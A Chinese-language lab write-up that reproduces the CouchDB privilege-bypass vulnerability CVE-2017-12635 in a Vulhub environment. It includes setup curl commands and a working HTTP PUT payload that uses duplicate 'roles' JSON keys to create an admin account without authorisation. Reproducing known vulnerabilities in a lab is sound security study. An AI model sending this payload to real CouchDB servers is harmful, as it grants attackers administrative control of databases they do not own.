跳转至

Couchdb 垂直权限绕过漏洞 CVE-2017-12635

漏洞描述

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

参考链接:

  • http://bobao.360.cn/learning/detail/4716.html
  • https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

漏洞影响

Couchdb 小于 1.7.0 以及 小于 2.1.1

环境搭建

Vulhub编译及启动环境:

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:5984/_utils/即可看到一个web页面,说明Couchdb已成功启动。但我们不知道密码,无法登陆。

漏洞复现

访问http://your-ip:5984/_users/org.couchdb.user:vulhub,如果出现404错误:{"error":"not_found","reason":"Database does not exist."},则说明当前Couchdb的初始化未完成,数据库不存在,需要手动进行配置。

Vulhub目录下存在init.sh文件:

┌──(root💀kali)-[/home/…/vulnerability/vulhub/couchdb/CVE-2017-12635]
└─# cat init.sh
#!/bin/bash

COUCHDB_URL=${COUCHDB_URL:-"couchdb:5984"}
COUCHDB_AUTH=${COUCHDB_AUTH:-"admin:password"}

while ! curl -m 5 "${COUCHDB_URL}"; do
    sleep 1
done

curl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_users
curl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_replicator
curl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_global_changes

依次执行命令,初始化Couchdb,新建_users_replicator_glocal_changes三个数据库:

curl -X PUT http://admin:password@192.168.174.128:5984/_users 
curl -X PUT http://admin:password@192.168.174.128:5984/_replicator
curl -X PUT http://admin:password@192.168.174.128:5984/_global_changes

image-20220222100506110

配置完成后,发送如下数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

image-20220222100650526

可见,返回403错误:{"error":"forbidden","reason":"Only _admin may set roles"},只有管理员才能设置Role角色

发送包含两个roles的数据包,即可绕过限制:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

成功创建管理员,账户密码均为vulhub

image-20220222100732534

再次访问http://your-ip:5984/_utils/,输入账户密码vulhub,可以成功登录:

image-20220222100904867